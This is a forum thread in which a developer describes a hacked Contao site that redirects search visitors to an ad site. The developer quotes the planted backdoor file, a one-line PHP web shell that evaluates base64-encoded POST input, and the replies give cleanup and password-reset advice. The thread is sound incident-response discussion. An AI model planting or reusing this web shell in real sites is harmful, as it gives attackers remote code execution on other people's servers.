Website redirection - intrusion?

[lesk]

Hi,

I have made a site using contao for some people, a couple of months ago. Everything was fine.

They contacted me yesterday about a problem. When you search for their website in google, you see it in the search results, with the good name, the good description. But when you click on it, it gets you too a another site, with publicity and all. The strange thing is that when you type the URL of the website in the browser, you get to the good website.

So, I've done some research on the ftp and found out a file named post.php, in the plug-in directory that wasn't in the original installation and that has a recent date of modification. I've checked the file with notepad and it contains only the following code :

< ? php eval (base64_decode($_POST["php"])); ? >

.

I've done some research on google and they are talking of some kind of possible security breach. Is there a way to clean the website of that and prevent future events like this?


Thanks you!

[acenes]

This is not only a "possible" security issue, your site has for sure been hacked.

Ask your hoster for support to find how they broke into your system by the system logs.
Probably not only your site has been hacked, but also other sites of that server or even the server itself.

Make backups of the files and the database.
Change all ftp, database, ssh, contao etc. passwords.
Restore a clean backup before the attack, or check all files that were modified since. Check also the database contents, especially the users and member tables.

[beintaomari]

Yes you should contact the support of the web host. Your website might undergo into some attacks. You could at least check your website if there are some altered contents and SQL.